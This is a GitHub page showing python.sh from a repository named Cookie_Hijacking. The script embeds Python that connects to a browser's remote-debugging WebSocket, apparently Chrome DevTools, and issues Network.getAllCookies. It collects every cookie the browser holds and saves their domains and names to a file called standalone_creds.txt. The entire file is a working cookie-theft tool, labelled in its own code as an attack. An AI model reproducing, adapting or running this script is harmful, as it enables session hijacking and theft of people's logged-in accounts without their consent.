Cookie_Hijacking/python.sh at DEV · BasGame1/Cookie_Hijacking · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
WS_URL="ADD WS_URL HERE!!!!!!"
python3 - << EOF
import socket, json, os, base64, urllib.parse, struct, time
WS_URL = "$WS_URL"
OUTPUT_FILE = "standalone_creds.txt"

def debug_attack():
    print(f"[*] Target: {WS_URL}")
    url = urllib.parse.urlparse(WS_URL)
    host = url.hostname
    port = url.port

    try:
        print(f"[*] Connecting to {host}:{port}...")
        s = socket.create_connection((host, port), timeout=5)

        print("[*] Sending Handshake...")
        key = base64.b64encode(os.urandom(16)).decode()
        handshake = (f"GET {url.path} HTTP/1.1\r\n"
                     f"Host: {url.netloc}\r\n"
                     "Upgrade: websocket\r\n"
                     "Connection: Upgrade\r\n"
                     f"Sec-WebSocket-Key: {key}\r\n"
                     "Sec-WebSocket-Version: 13\r\n\r\n")
        s.send(handshake.encode())

        resp = s.recv(4096)
        if b"101" not in resp:
            print(f"[-] Handshake truly failed: {resp.decode()}")
            return

        print("[+] Handshake Accepted (101 Switching Protocols).")
        cmd = json.dumps({"id": 1, "method": "Network.getAllCookies"})
        payload = cmd.encode()
        header = bytearray([0x81, 0x80 | len(payload)])
        mask = os.urandom(4)
        masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
        s.send(header + mask + masked_payload)

        print("[*] Awaiting data (streaming 1600+ cookies can take time)...")
        raw_res = b""
        s.settimeout(10)

        while True:
            try:
                chunk = s.recv(1048576) # 1MB buffer
                if not chunk: break
                raw_res += chunk
                print(f"[>] Received {len(raw_res)} bytes...")

                # Completion check: look for the closing JSON brace
                if b'"id":1' in raw_res and raw_res.strip().endswith(b'}'):
                    break
            except socket.timeout:
                print("[!] Timeout reached. Processing partial data...")
                break

        print("[*] Parsing JSON...")
        json_start = raw_res.find(b'{')
        data = json.loads(raw_res[json_start:].decode('utf-8', errors='ignore'))
        cookies = data.get('result', {}).get('cookies', [])

        print(f"[+] Found {len(cookies)} cookies!")
        with open(OUTPUT_FILE, "w") as f:
            for c in cookies:
                f.write(f"DOMAIN: {c['domain']} | NAME: {c['name']}\n")

        print(f"[+] Success! Check {OUTPUT_FILE}")

    except Exception as e:
        print(f"[CRITICAL ERROR] {e}")
    finally:
        if 's' in locals(): s.close()

if __name__ == "__main__":
    debug_attack()
EOF